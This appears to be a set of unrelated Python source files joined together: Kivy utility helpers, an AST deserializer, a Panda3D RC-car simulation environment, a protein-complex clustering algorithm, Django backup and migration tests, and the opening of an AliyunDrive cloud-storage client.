from kivy.weakproxy import WeakProxy
import json
from io import StringIO
from ruamel.yaml import YAML, SafeRepresenter
__all__ = ('pretty_time', 'pretty_space', 'byteify', 'json_dumps',
'json_loads', 'ColorTheme', 'apply_args_post')
SafeRepresenter.add_representer(ObservableList, SafeRepresenter.represent_list)
SafeRepresenter.add_representer(ObservableDict, SafeRepresenter.represent_dict)
def pretty_time(seconds):
'''Returns a nice representation of a time value.
:Parameters:
`seconds`: float, int
The number, in seconds, to convert to a string.
:returns:
String representation of the time.
For example::
>>> pretty_time(36574)
'10:9:34.0'
'''
seconds = int(seconds * 10)
s, ms = divmod(seconds, 10)
m, s = divmod(s, 60)
h, m = divmod(m, 60)
if h:
return '{0:d}:{1:d}:{2:d}.{3:d}'.format(h, m, s, ms)
elif m:
return '{0:d}:{1:d}.{2:d}'.format(m, s, ms)
else:
return '{0:d}.{1:d}'.format(s, ms)
def pretty_space(space, is_rate=False):
'''Returns a nice string representation of a number representing either
size, e.g. 10 MB, or rate, e.g. 10 MB/s.
:Parameters:
`space`: float, int
The number to convert.
`is_rate`: bool
Whether the number represents size or rate. Defaults to False.
:returns:
String representation of the space.
For example::
>>> pretty_space(10003045065)
'9.32 GB'
>>> tools.pretty_space(10003045065, is_rate=True)
'9.32 GB/s'
'''
t = '/s' if is_rate else ''
for x in ['bytes', 'KB', 'MB', 'GB']:
if space < 1024.0:
return "%3.2f %s%s" % (space, x, t)
space /= 1024.0
return "%3.2f %s%s" % (space, 'TB', t)
def byteify(val, py2_only=True):
'''Returns a copy of the input with all string in the input converted to
bytes.
:Parameters:
`val`: object
The object to convert.
`py2_only`: bool
If the conversion should happen in Python 2.x only. If False,
it's always converted. If True, the default, it's only converted to
bytes when running in Python 2.
For example in python 2::
>>> obj = {u'cheese': u'crackers', 4: [u'four', u'apple', 5, \
'cheeses']}
>>> obj
{u'cheese': u'crackers', 4: [u'four', u'apple', 5, 'cheeses']}
>>> byteify(obj)
{'cheese': 'crackers', 4: ['four', 'apple', 5, 'cheeses']}
'''
if not PY2 and py2_only:
return val
if isinstance(val, dict):
return {byteify(key): byteify(value)
for key, value in val.items()}
elif isinstance(val, list):
return [byteify(element) for element in val]
elif isinstance(val, unicode):
return val.encode('utf-8')
else:
return val
def unicodify(val, py3_only=False):
if PY2 and py3_only:
return val
if isinstance(val, dict):
return {unicodify(key): unicodify(value)
for key, value in val.items()}
elif isinstance(val, list):
return [unicodify(element) for element in val]
elif isinstance(val, bytes):
return val.decode('utf-8')
else:
return val
def json_dumps(value):
return json.dumps(value, sort_keys=True, indent=4, separators=(',', ': '))
def json_loads(value):
decoded = json.loads(value)
return byteify(decoded, True)
def _get_yaml():
yaml = YAML(typ='safe')
return yaml
def yaml_dumps(value):
yaml = _get_yaml()
s = StringIO()
yaml.preserve_quotes = True
yaml.dump(value, s)
return s.getvalue()
def yaml_loads(value):
yaml = _get_yaml()
return yaml.load(value)
class ColorTheme(EventDispatcher):
'''Default values from https://www.materialpalette.com/amber/indigo
'''
primary_dark = StringProperty(get_color_from_hex('FFA000FF'))
primary = StringProperty(get_color_from_hex('FFC107FF'))
primary_light = StringProperty(get_color_from_hex('FFECB3FF'))
primary_text = StringProperty(get_color_from_hex('FFFFFFFF'))
'''This is different.
'''
accent = StringProperty(get_color_from_hex('536DFEFF'))
text_primary = StringProperty(get_color_from_hex('212121FF'))
text_secondary = StringProperty(get_color_from_hex('757575FF'))
divider = StringProperty(get_color_from_hex('BDBDBDFF'))
@staticmethod
def interpolate(color1, color2, fraction):
color = []
for c1, c2 in zip(color1, color2):
c = min(max((c2 - c1) * fraction + c1, 0), 1)
color.append(c)
return color
class KVBehavior(object):
pass
def apply_args_post(cls, **keywordargs):
def ret_func(*largs, **kwargs):
o = cls(*largs, **kwargs)
for key, value in keywordargs.items():
setattr(o, key, value)
return o
return ret_func
Factory.register(classname='ColorTheme', cls=ColorTheme)
Factory.register(classname='KVBehavior', cls=KVBehavior)
|
<filename>python/utir/deserializer/__init__.py<gh_stars>1-10
from utir import ast
from utir.exception import InvalidFileFormatError
class ASTDeserializer:
def deserialize(self, object):
if 'Version' not in object.keys():
raise InvalidFileFormatError("Key of 'Version' dose not exist.")
if object['Version'] == 0:
return self._deserialize_object(object)
raise InvalidFileFormatError(
"Unsupported Version %s" % object['Version'])
def _deserialize_object(self, object):
if 'File' in object.keys():
obj = object['File']
return ast.File(
[self._deserialize_object(i) for i in obj['Body']],)
if 'FunctionDef' in object.keys():
obj = object['FunctionDef']
return ast.FunctionDef(
obj['Name'], [self._deserialize_object(i) for i in obj['Args']], [self._deserialize_object(i) for i in obj['Body']],)
if 'ClassDef' in object.keys():
obj = object['ClassDef']
return ast.ClassDef(
obj['Name'], obj['Bases'], [self._deserialize_object(i) for i in obj['Fields']], [self._deserialize_object(i) for i in obj['Body']],)
if 'Return' in object.keys():
obj = object['Return']
return ast.Return(
self._deserialize_object(obj['Value']),)
if 'Assign' in object.keys():
obj = object['Assign']
return ast.Assign(
self._deserialize_object(obj['Target']), self._deserialize_object(obj['Value']),)
if 'For' in object.keys():
obj = object['For']
return ast.For(
self._deserialize_object(obj['Value']), self._deserialize_object(obj['Generator']), [self._deserialize_object(i) for i in obj['Body']],)
if 'Block' in object.keys():
obj = object['Block']
return ast.Block(
[self._deserialize_object(i) for i in obj['Body']],)
if 'Try' in object.keys():
obj = object['Try']
return ast.Try(
[self._deserialize_object(i) for i in obj['Body']],)
if 'Raise' in object.keys():
obj = object['Raise']
return ast.Raise(
self._deserialize_object(obj['Value']),)
if 'Catch' in object.keys():
obj = object['Catch']
return ast.Catch(
[self._deserialize_object(i) for i in obj['Body']],)
if 'BoolOp' in object.keys():
obj = object['BoolOp']
return ast.BoolOp(
obj['Kind'], self._deserialize_object(obj['Left']), self._deserialize_object(obj['Right']),)
if 'BinOp' in object.keys():
obj = object['BinOp']
return ast.BinOp(
obj['Kind'], self._deserialize_object(obj['Left']), self._deserialize_object(obj['Right']),)
if 'UnaryOp' in object.keys():
obj = object['UnaryOp']
return ast.UnaryOp(
obj['Kind'], self._deserialize_object(obj['Value']),)
if 'Constant' in object.keys():
obj = object['Constant']
return ast.Constant(
obj['Kind'], obj['Value'],)
if 'Attribute' in object.keys():
obj = object['Attribute']
return ast.Attribute(
self._deserialize_object(obj['Value']), obj['Attribute'],)
if 'Subscript' in object.keys():
obj = object['Subscript']
return ast.Subscript(
self._deserialize_object(obj['Value']), self._deserialize_object(obj['Index']),)
if 'Name' in object.keys():
obj = object['Name']
return ast.Name(
obj['Name'], obj['Kind'],)
if 'Array' in object.keys():
obj = object['Array']
return ast.Array(
[self._deserialize_object(i) for i in obj['Values']],)
if 'Tuple' in object.keys():
obj = object['Tuple']
return ast.Tuple(
[self._deserialize_object(i) for i in obj['Values']],)
if 'Call' in object.keys():
obj = object['Call']
return ast.Call(
self._deserialize_object(obj['Value']), [self._deserialize_object(i) for i in obj['Args']], [self._deserialize_object(i) for i in obj['KwArgs']],)
if 'ArgumentDef' in object.keys():
obj = object['ArgumentDef']
return ast.ArgumentDef(
obj['Key'], obj['Default'] if obj['Default'] is None else self._deserialize_object(obj['Default']),)
if 'KwArg' in object.keys():
obj = object['KwArg']
return ast.KwArg(
obj['Key'], self._deserialize_object(obj['Value']),)
|
<gh_stars>100-1000
import time
import numpy as np
import sys
from sandbox.gkahn.gcg.envs.rccar.panda3d_camera_sensor import Panda3dCameraSensor
from direct.showbase.DirectObject import DirectObject
from direct.showbase.ShowBase import ShowBase
from panda3d.core import loadPrcFileData
from panda3d.core import AmbientLight
from panda3d.core import DirectionalLight
from panda3d.core import Vec3
from panda3d.core import Vec4
from panda3d.core import Point3
from panda3d.core import TransformState
from panda3d.core import BitMask32
from panda3d.bullet import BulletWorld
from panda3d.bullet import BulletBoxShape
from panda3d.bullet import BulletPlaneShape
from panda3d.bullet import BulletRigidBodyNode
from panda3d.bullet import BulletVehicle
from panda3d.bullet import BulletHelper
from panda3d.bullet import BulletRigidBodyNode
from panda3d.bullet import ZUp
class CarEnv(DirectObject):
def __init__(self, params={}):
self._params = params
if 'random_seed' in self._params:
np.random.seed(self._params['random_seed'])
self._use_vel = self._params.get('use_vel', True)
self._run_as_task = self._params.get('run_as_task', False)
self._do_back_up = self._params.get('do_back_up', False)
self._use_depth = self._params.get('use_depth', False)
self._use_back_cam = self._params.get('use_back_cam', False)
self._collision_reward = self._params.get('collision_reward', 0.)
if not self._params.get('visualize', False):
loadPrcFileData('', 'window-type offscreen')
# Defines base, render, loader
try:
ShowBase()
except:
pass
base.setBackgroundColor(0.0, 0.0, 0.0, 1)
# World
self._worldNP = render.attachNewNode('World')
self._world = BulletWorld()
self._world.setGravity(Vec3(0, 0, -9.81))
self._dt = params.get('dt', 0.25)
self._step = 0.05
# Vehicle
shape = BulletBoxShape(Vec3(0.6, 1.0, 0.25))
ts = TransformState.makePos(Point3(0., 0., 0.25))
self._vehicle_node = BulletRigidBodyNode('Vehicle')
self._vehicle_node.addShape(shape, ts)
self._mass = self._params.get('mass', 10.)
self._vehicle_node.setMass(self._mass)
self._vehicle_node.setDeactivationEnabled(False)
self._vehicle_node.setCcdSweptSphereRadius(1.0)
self._vehicle_node.setCcdMotionThreshold(1e-7)
self._vehicle_pointer = self._worldNP.attachNewNode(self._vehicle_node)
self._world.attachRigidBody(self._vehicle_node)
self._vehicle = BulletVehicle(self._world, self._vehicle_node)
self._vehicle.setCoordinateSystem(ZUp)
self._world.attachVehicle(self._vehicle)
self._addWheel(Point3( 0.3, 0.5, 0.07), True, 0.07)
self._addWheel(Point3(-0.3, 0.5, 0.07), True, 0.07)
self._addWheel(Point3( 0.3, -0.5, 0.07), False, 0.07)
self._addWheel(Point3(-0.3, -0.5, 0.07), False, 0.07)
# Camera
size = self._params.get('size', [160, 90])
hfov = self._params.get('hfov', 60)
near_far = self._params.get('near_far', [0.1, 100.])
self._camera_sensor = Panda3dCameraSensor(
base,
color=not self._use_depth,
depth=self._use_depth,
size=size,
hfov=hfov,
near_far=near_far,
title='front cam')
self._camera_node = self._camera_sensor.cam
self._camera_node.setPos(0.0, 0.5, 0.375)
self._camera_node.lookAt(0.0, 6.0, 0.0)
self._camera_node.reparentTo(self._vehicle_pointer)
if self._use_back_cam:
self._back_camera_sensor = Panda3dCameraSensor(
base,
color=not self._use_depth,
depth=self._use_depth,
size=size,
hfov=hfov,
near_far=near_far,
title='back cam')
self._back_camera_node = self._back_camera_sensor.cam
self._back_camera_node.setPos(0.0, -0.5, 0.375)
self._back_camera_node.lookAt(0.0, -6.0, 0.0)
self._back_camera_node.reparentTo(self._vehicle_pointer)
# Car Simulator
self._des_vel = None
self._setup()
# Input
self.accept('escape', self._doExit)
self.accept('r', self.reset)
self.accept('f1', self._toggleWireframe)
self.accept('f2', self._toggleTexture)
self.accept('f3', self._view_image)
self.accept('f5', self._doScreenshot)
self.accept('q', self._forward_0)
self.accept('w', self._forward_1)
self.accept('e', self._forward_2)
self.accept('a', self._left)
self.accept('s', self._stop)
self.accept('x', self._backward)
self.accept('d', self._right)
self.accept('m', self._mark)
self._steering = 0.0 # degree
self._engineForce = 0.0
self._brakeForce = 0.0
self._p = self._params.get('p', 1.25)
self._d = self._params.get('d', 0.0)
self._last_err = 0.0
self._curr_time = 0.0
self._accelClamp = self._params.get('accelClamp', 2.0)
self._engineClamp = self._accelClamp * self._mass
self._collision = False
if self._run_as_task:
self._mark_d = 0.0
taskMgr.add(self._update_task, 'updateWorld')
base.run()
# _____HANDLER_____
def _doExit(self):
sys.exit(1)
def _toggleWireframe(self):
base.toggleWireframe()
def _toggleTexture(self):
base.toggleTexture()
def _doScreenshot(self):
base.screenshot('Bullet')
def _forward_0(self):
self._des_vel = 1
self._brakeForce = 0.0
def _forward_1(self):
self._des_vel = 2
self._brakeForce = 0.0
def _forward_2(self):
self._des_vel = 4
self._brakeForce = 0.0
def _stop(self):
self._des_vel = 0.0
self._brakeForce = 0.0
def _backward(self):
self._des_vel = -4
self._brakeForce = 0.0
def _right(self):
self._steering = np.min([np.max([-30, self._steering - 5]), 0.0])
def _left(self):
self._steering = np.max([np.min([30, self._steering + 5]), 0.0])
def _view_image(self):
from matplotlib import pyplot as plt
image = self._camera_sensor.observe()[0]
if self._use_depth:
plt.imshow(image[:, :, 0], cmap='gray')
else:
import cv2
def rgb2gray(rgb):
return np.dot(rgb[..., :3], [0.299, 0.587, 0.114])
image = rgb2gray(image)
im = cv2.resize(image, (64, 36), interpolation=cv2.INTER_AREA) # TODO how does this deal with aspect ratio
plt.imshow(im.astype(np.uint8), cmap='Greys_r')
plt.show()
def _mark(self):
self._mark_d = 0.0
# Setup
def _setup(self):
if hasattr(self, '_model_path'):
# Collidable objects
visNP = loader.loadModel(self._model_path)
visNP.clearModelNodes()
visNP.reparentTo(render)
pos = (0., 0., 0.)
visNP.setPos(pos[0], pos[1], pos[2])
bodyNPs = BulletHelper.fromCollisionSolids(visNP, True)
for bodyNP in bodyNPs:
bodyNP.reparentTo(render)
bodyNP.setPos(pos[0], pos[1], pos[2])
if isinstance(bodyNP.node(), BulletRigidBodyNode):
bodyNP.node().setMass(0.0)
bodyNP.node().setKinematic(True)
bodyNP.setCollideMask(BitMask32.allOn())
self._world.attachRigidBody(bodyNP.node())
else:
ground = self._worldNP.attachNewNode(BulletRigidBodyNode('Ground'))
shape = BulletPlaneShape(Vec3(0, 0, 1), 0)
ground.node().addShape(shape)
ground.setCollideMask(BitMask32.allOn())
self._world.attachRigidBody(ground.node())
self._place_vehicle()
self._setup_light()
self._setup_restart_pos()
def _setup_restart_pos(self):
self._restart_pos = []
self._restart_index = 0
if self._params.get('position_ranges', None) is not None:
ranges = self._params['position_ranges']
num_pos = self._params['num_pos']
if self._params.get('range_type', 'random') == 'random':
for _ in range(num_pos):
ran = ranges[np.random.randint(len(ranges))]
self._restart_pos.append(np.random.uniform(ran[0], ran[1]))
elif self._params['range_type'] == 'fix_spacing':
num_ran = len(ranges)
num_per_ran = num_pos // num_ran
for i in range(num_ran):
ran = ranges[i]
low = np.array(ran[0])
diff = np.array(ran[1]) - np.array(ran[0])
for j in range(num_per_ran):
val = diff * ((j + 0.0) / num_per_ran) + low
self._restart_pos.append(val)
elif self._params.get('positions', None) is not None:
self._restart_pos = self._params['positions']
else:
self._restart_pos = self._default_restart_pos()
def _next_restart_pos_hpr(self):
num = len(self._restart_pos)
if num == 0:
return None, None
else:
pos_hpr = self._restart_pos[self._restart_index]
self._restart_index = (self._restart_index + 1) % num
return pos_hpr[:3], pos_hpr[3:]
def _next_random_restart_pos_hpr(self):
num = len(self._restart_pos)
if num == 0:
return None, None
else:
index = np.random.randint(num)
pos_hpr = self._restart_pos[index]
self._restart_index = (self._restart_index + 1) % num
return pos_hpr[:3], pos_hpr[3:]
def _setup_light(self):
alight = AmbientLight('ambientLight')
alight.setColor(Vec4(0.5, 0.5, 0.5, 1))
alightNP = render.attachNewNode(alight)
render.clearLight()
render.setLight(alightNP)
# Vehicle
def _default_pos(self):
return (0.0, 0.0, 0.3)
def _default_hpr(self):
return (0.0, 0.0, 3.14)
def _default_restart_pos():
return [self._default_pos() + self._default_hpr()]
def _get_speed(self):
vel = self._vehicle.getCurrentSpeedKmHour() / 3.6
return vel
def _update(self, dt=1.0, coll_check=True):
self._vehicle.setSteeringValue(self._steering, 0)
self._vehicle.setSteeringValue(self._steering, 1)
self._vehicle.setBrake(self._brakeForce, 0)
self._vehicle.setBrake(self._brakeForce, 1)
self._vehicle.setBrake(self._brakeForce, 2)
self._vehicle.setBrake(self._brakeForce, 3)
if dt >= self._step:
# TODO maybe change number of timesteps
for i in range(int(dt/self._step)):
if self._des_vel is not None:
vel = self._get_speed()
err = self._des_vel - vel
d_err = (err - self._last_err) / self._step
self._last_err = err
self._engineForce = np.clip(self._p * err + self._d * d_err, -self._accelClamp, self._accelClamp) * self._mass
self._vehicle.applyEngineForce(self._engineForce, 0)
self._vehicle.applyEngineForce(self._engineForce, 1)
self._vehicle.applyEngineForce(self._engineForce, 2)
self._vehicle.applyEngineForce(self._engineForce, 3)
self._world.doPhysics(self._step, 1, self._step)
self._collision = self._is_contact()
elif self._run_as_task:
self._curr_time += dt
if self._curr_time > 0.05:
if self._des_vel is not None:
vel = self._get_speed()
self._mark_d += vel * self._curr_time
print(vel, self._mark_d, self._is_contact())
err = self._des_vel - vel
d_err = (err - self._last_err) / 0.05
self._last_err = err
self._engineForce = np.clip(self._p * err + self._d * d_err, -self._accelClamp, self._accelClamp) * self._mass
self._curr_time = 0.0
self._vehicle.applyEngineForce(self._engineForce, 0)
self._vehicle.applyEngineForce(self._engineForce, 1)
self._vehicle.applyEngineForce(self._engineForce, 2)
self._vehicle.applyEngineForce(self._engineForce, 3)
self._world.doPhysics(dt, 1, dt)
self._collision = self._is_contact()
else:
raise ValueError("dt {0} s is too small for velocity control".format(dt))
def _stop_car(self):
self._steering = 0.0
self._engineForce = 0.0
self._vehicle.setSteeringValue(0.0, 0)
self._vehicle.setSteeringValue(0.0, 1)
self._vehicle.applyEngineForce(0.0, 0)
self._vehicle.applyEngineForce(0.0, 1)
self._vehicle.applyEngineForce(0.0, 2)
self._vehicle.applyEngineForce(0.0, 3)
if self._des_vel is not None:
self._des_vel = 0
self._vehicle_node.setLinearVelocity(Vec3(0.0, 0.0, 0.0))
self._vehicle_node.setAngularVelocity(Vec3(0.0, 0.0, 0.0))
for i in range(self._vehicle.getNumWheels()):
wheel = self._vehicle.getWheel(i)
wheel.setRotation(0.0)
self._vehicle_node.clearForces()
def _place_vehicle(self, pos=None, hpr=None):
if pos is None:
pos = self._default_pos()
if hpr is None:
hpr = self._default_hpr()
self._vehicle_pointer.setPos(pos[0], pos[1], pos[2])
self._vehicle_pointer.setHpr(hpr[0], hpr[1], hpr[2])
self._stop_car()
def _addWheel(self, pos, front, radius=0.25):
wheel = self._vehicle.createWheel()
wheel.setChassisConnectionPointCs(pos)
wheel.setFrontWheel(front)
wheel.setWheelDirectionCs(Vec3(0, 0, -1))
wheel.setWheelAxleCs(Vec3(1, 0, 0))
wheel.setWheelRadius(radius)
wheel.setMaxSuspensionTravelCm(40.0)
wheel.setSuspensionStiffness(40.0)
wheel.setWheelsDampingRelaxation(2.3)
wheel.setWheelsDampingCompression(4.4)
wheel.setFrictionSlip(1e2)
wheel.setRollInfluence(0.1)
# Task
def _update_task(self, task):
dt = globalClock.getDt()
self._update(dt=dt)
self._get_observation()
return task.cont
# Helper functions
def _get_observation(self):
self._obs = self._camera_sensor.observe()
observation = []
observation.append(self._obs[0])
if self._use_back_cam:
self._back_obs = self._back_camera_sensor.observe()
observation.append(self._back_obs[0])
observation = np.concatenate(observation, axis=2)
return observation
def _get_reward(self):
reward = self._collision_reward if self._collision else self._get_speed()
return reward
def _get_done(self):
return self._collision
def _get_info(self):
info = {}
info['pos'] = np.array(self._vehicle_pointer.getPos())
info['hpr'] = np.array(self._vehicle_pointer.getHpr())
info['vel'] = self._get_speed()
info['coll'] = self._collision
return info
def _back_up(self):
assert(self._use_vel)
back_up_vel = self._params['back_up'].get('vel', -2.0)
self._des_vel = back_up_vel
back_up_steer = self._params['back_up'].get('steer', (-5.0, 5.0))
# TODO
self._steering = np.random.uniform(*back_up_steer)
self._brakeForce = 0.
duration = self._params['back_up'].get('duration', 1.0)
self._update(dt=duration)
self._des_vel = 0.0
self._steering = 0.0
self._update(dt=duration)
self._brakeForce = 0.
def _is_contact(self):
result = self._world.contactTest(self._vehicle_node)
num_contacts = result.getNumContacts()
return result.getNumContacts() > 0
# Environment functions
def reset(self, pos=None, hpr=None, hard_reset=False, random_reset=False):
if self._do_back_up and not hard_reset and \
pos is None and hpr is None:
if self._collision:
self._back_up()
else:
if pos is None and hpr is None:
if random_reset:
pos, hpr = self._next_random_restart_pos_hpr()
else:
pos, hpr = self._next_restart_pos_hpr()
self._place_vehicle(pos=pos, hpr=hpr)
self._collision = False
return self._get_observation()
def step(self, action):
self._steering = action[0]
if action[1] == 0.0:
self._brakeForce = 1000.
else:
self._brakeForce = 0.
if self._use_vel:
# Convert from m/s to km/h
self._des_vel = action[1]
else:
self._engineForce = self._engineClamp * \
((action[1] - 49.5) / 49.5)
self._update(dt=self._dt)
observation = self._get_observation()
reward = self._get_reward()
done = self._get_done()
info = self._get_info()
return observation, reward, done, info
if __name__ == '__main__':
params = {'visualize': True, 'run_as_task': True}
env = CarEnv(params)
|
# Author: <NAME> <<EMAIL>>
# A core-attachment based method to detect protein complexes in PPI networks
# <NAME>, Kwoh, Ng (2009)
# http://www.biomedcentral.com/1471-2105/10/169
from collections import defaultdict
from itertools import combinations
import functools
# return average degree and density for a graph
def __graph_stats(graph):
avg_deg = sum(len(n) for n in graph.values()) / float(len(graph))
density = avg_deg / (len(graph) - 1)
return avg_deg, density
# return core nodes, given a graph and its average degree
__get_core_nodes = lambda g, avg: set(v for v, n in g.items() if len(n) >= avg)
# return NA score
__NA_score = lambda a, b: float(len(a & b) ** 2) / (len(a) * len(b))
def __core_removal(graph, density_threshold):
if len(graph) == 1: # need at least two nodes in the graph...
return [graph]
avg_deg, density = __graph_stats(graph)
if density >= density_threshold:
return [graph]
else:
# find and remove core nodes; create connected subcomponents
core_nodes = __get_core_nodes(graph, avg_deg)
result = []
subgraphs = []
for v, n in graph.items():
if v in core_nodes:
continue
n = n - core_nodes # note that we're reassigning n
for s in subgraphs:
if not n.isdisjoint(s):
s |= n
break
else:
subgraphs.append(n | {v})
# connected subcomponent joining
i = 0
while i < len(subgraphs) - 1:
j = i + 1
while j < len(subgraphs):
if not subgraphs[i].isdisjoint(subgraphs[j]):
subgraphs[i] |= subgraphs[j]
subgraphs.pop(j)
else:
j += 1
i += 1
# recursive core removal
for s in subgraphs:
tresults = __core_removal(
dict((v, graph[v] & s) for v in s), density_threshold
)
for tc in tresults:
nodes = set()
for v, n in tc.items():
nodes.add(v)
n |= graph[v] & core_nodes
for c in core_nodes:
tc[c] = graph[c] & (nodes | core_nodes)
result += tresults
return result
def co_ach(g, density_threshold=0.7, affinity_threshold=0.225, closeness_threshold=0.5):
# read protein-protein pairs
data = defaultdict(set)
for a, b in g.edges():
data[a].add(b)
data[b].add(a)
# step 1: find preliminary cores
SC = [] # currently-detected preliminary cores
count = 0
for vertex, neighbors in data.items():
# build neighborhood graph
vertices = {vertex} | neighbors
size1_neighbors = set()
graph = {}
for v in vertices:
n = data[v] & vertices
if len(n) > 1: # ignore size-1 vertices
graph[v] = n
else:
size1_neighbors.add(v)
if len(graph) < 2: # not enough connections in this graph
continue
graph[vertex] -= size1_neighbors
# get core graph
avg_deg, density = __graph_stats(graph)
core_nodes = __get_core_nodes(graph, avg_deg)
vertices = set(graph.keys())
for v in vertices - core_nodes:
del graph[v]
for n in graph.values():
n &= core_nodes
if len(graph) < 2: # not enough connections in this graph
continue
graph_nodes = set(graph)
# inner loop
for sg in __core_removal(graph, density_threshold):
while True:
_, density = __graph_stats(sg)
# if density threshold met, stop; else, remove min degree node
if density >= density_threshold:
break
w = min(sg.items(), key=lambda k: len(k[1]))[0]
del sg[w]
for n in sg.values():
n.discard(w)
sg_nodes = set(sg)
while graph_nodes - sg_nodes:
w = max(graph_nodes - sg_nodes, key=lambda v: len(graph[v] & sg_nodes))
new_sg = sg.copy()
for v, n in new_sg.items():
if w in graph[v]:
n.add(w)
new_sg[w] = graph[w] & sg_nodes
_, density = __graph_stats(new_sg)
if density < density_threshold:
break
sg = new_sg
sg_nodes.add(w)
# redundancy filtering
max_sim = -1
for i in range(len(SC)):
sim = __NA_score(set(SC[i]), sg_nodes)
if sim > max_sim:
max_sim = sim
index = i
if max_sim < affinity_threshold:
SC.append(sg)
else:
_, density_i = __graph_stats(SC[index])
if density * len(sg) > density_i * len(SC[index]):
SC[index] = sg
# step 2: adding peripheral proteins
clusters = set()
for core in SC:
nodes = frozenset(core)
neighbors = (
functools.reduce(lambda x, y: x | y, (data[v] for v in nodes)) - nodes
)
neighbors -= set(
v
for v in neighbors
if float(len(data[v] & nodes)) / len(nodes) <= closeness_threshold
)
clusters.add(nodes | neighbors)
return [list(c) for c in clusters]
|
import os
from django.core import management
from django.core.exceptions import ImproperlyConfigured
from django.test import TransactionTestCase
from django.test.utils import override_settings
try:
from unittest import skipIf
except ImportError:
# Python 2.6 doesn't include skipIf, but Django 1.6 has a copy
from django.utils.unittest import skipIf
import django
TEST_APP_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
def _get_migrations():
from south.models import MigrationHistory
return list(MigrationHistory.objects.all()
.order_by('id')
.values_list('migration', flat=True))
@override_settings(SOUTH_TESTS_MIGRATE=True)
class BackupTestCase(TransactionTestCase):
def test_fixture_dir(self):
from avocado.core import backup
self.assertEqual(backup.get_fixture_dir(),
os.path.join(TEST_APP_DIR, 'fixtures'))
def test_safe_load_tmp(self):
from avocado.core import backup
from avocado.models import DataField
management.call_command('avocado', 'init', 'tests', quiet=True)
self.assertEqual(DataField.objects.count(), 12)
backup_path = backup.safe_load('0001_avocado_metadata')
self.assertTrue(os.path.exists(backup_path))
self.assertEqual(DataField.objects.count(), 3)
os.remove(backup_path)
def test_safe_load(self):
from avocado.core import backup
from avocado.models import DataField
management.call_command('avocado', 'init', 'tests', quiet=True)
self.assertEqual(DataField.objects.count(), 12)
backup_path = backup.safe_load('0001_avocado_metadata',
backup_path='backup.json')
self.assertTrue(os.path.exists('backup.json'))
self.assertEqual(DataField.objects.count(), 3)
os.remove(backup_path)
def test_fixture_filenames(self):
from avocado.core import backup
filenames = backup._fixture_filenames(backup.get_fixture_dir())
self.assertEqual(filenames, ['0001_avocado_metadata.json'])
def test_next_fixture_name(self):
from avocado.core import backup
from avocado.conf import settings
filename = backup.next_fixture_name(settings.METADATA_FIXTURE_SUFFIX,
backup.get_fixture_dir())
self.assertEqual(filename, '0002_avocado_metadata')
@skipIf(django.VERSION >= (1, 7), "South isn't supported in Django 1.7")
def test_migration_call(self):
from avocado.core import backup
from south import migration
management.call_command('avocado', 'migration', quiet=True)
migration_dir = os.path.join(TEST_APP_DIR, 'migrations')
self.assertTrue(os.path.exists(os.path.join(migration_dir,
'0002_avocado_metadata_migration.py')))
os.remove(os.path.join(migration_dir,
'0002_avocado_metadata_migration.py'))
os.remove(os.path.join(backup.get_fixture_dir(),
'0002_avocado_metadata.json'))
# TransactionTestCase rolls back the database after each test case,
# but South does not know this, courtesy of caching in
# migration.Migrations.
migration.Migrations._clear_cache()
@skipIf(django.VERSION >= (1, 7), "South isn't supported in Django 1.7")
def test_migration_call_no_fake(self):
# This test superficially looks like it tests the --no-fake switch,
# but it doesn't fully succeed, because the Django managemement
# API can't duplicate the behavior of command line boolean switches.
# The --no-fake switch bug (#171) can't be tested via the internal
# API. In fact, any test case for a boolean switch has to
# execute a shell command. That opens a can of worms, because
# to perform a migration in a shell command, we would have to replace
# TransactionTestCase with TestCase, which would require substantial
# changes to this test class. This is an awful lot of work for one
# trivial bug fix.
from avocado.core import backup
from south import migration
management.call_command('avocado', 'migration', no_fake=True,
quiet=True)
migrations = _get_migrations()
self.assertEqual(migrations, [])
migration_dir = os.path.join(TEST_APP_DIR, 'migrations')
self.assertTrue(os.path.exists(os.path.join(migration_dir,
'0002_avocado_metadata_migration.py')))
os.remove(os.path.join(migration_dir,
'0002_avocado_metadata_migration.py'))
os.remove(os.path.join(backup.get_fixture_dir(),
'0002_avocado_metadata.json'))
migration.Migrations._clear_cache()
def test_migration(self):
management.call_command('migrate', 'core', verbosity=0)
def test_missing_setting(self):
from avocado.conf import settings
previous = settings.METADATA_MIGRATION_APP
setattr(settings._wrapped, 'METADATA_MIGRATION_APP', None)
try:
from avocado.core import backup # noqa
backup._check_app()
self.assertTrue(False)
except ImproperlyConfigured:
self.assertTrue(True)
finally:
setattr(settings._wrapped, 'METADATA_MIGRATION_APP', previous)
|
import threading
import time
from concurrent.futures import as_completed
from altfe.interface.cloud import interCloud
from app.lib.core.aliyundrive.aliyundrive import AliyunDrive
@interCloud.bind("cloud_aliyundrive", "LIB_CORE")
class CoreAliyunDrive(interCloud):
def __init__(self):
super().__init__()
self.conf = self.INS.conf.dict("aliyundrive")
self.api = {}
self.listOutdated = 0
self.rootPath = [x for x in self.conf["rootPath"].split("/") if x != ""]
self.auto()
def auto(self):
if self.conf["accounts"] is None:
return
self.is_on = True
_token = self.loadConfig(self.getENV("rootPathFrozen") + "app/config/.token/aliyundrive.json", default={})
for u in self.conf["accounts"]:
if u not in _token:
print(f"[阿里云盘@{u}] 根据此网址「https://media.cooluc.com/decode_token/」的方法获取 Refresh Token 或 BizExt 以登录")
_input = str(input(f"Refresh_Token or BizExt: ").strip())
if len(_input) > 64:
rtCode = AliyunDrive.get_userinfo_via_bizext(_input)
else:
rtCode = _input
else:
rtCode = _token[u]["refresh"]
self.api[u] = AliyunDrive(rtCode)
if not self.api[u].do_refresh_token():
print(f"[AliyunDrive@{u}] 登录失败")
self.__save_token()
t = threading.Timer(0, self.__check)
t.setDaemon(True)
t.start()
def __check(self):
while True:
tim = time.time()
isUP = False
for u in self.api:
if tim > self.api[u].get_token("expire") - 600:
try:
self.api[u].do_refresh_token()
except Exception as e:
self.STATIC.localMsger.error(e)
else:
isUP = True
if isUP:
self.__save_token()
if tim > self.listOutdated:
self.load_list()
time.sleep(self.conf["sys_checkTime"])
def __save_token(self):
r = {}
for u in self.api:
r[u] = self.api[u].get_token()
self.STATIC.file.aout(self.getENV("rootPathFrozen") + "app/config/.token/aliyundrive.json", r)
def load_list(self):
if self.is_on is False:
return False
for u in self.conf["accounts"].copy():
self.inCheck = True
tmp = []
try:
self.__pro_load_list(u, tmp)
psws = interCloud.process_add_password(tmp)
except Exception as e:
self.STATIC.localMsger.error(e)
else:
self.lock.acquire()
self.dirPassword[u] = psws
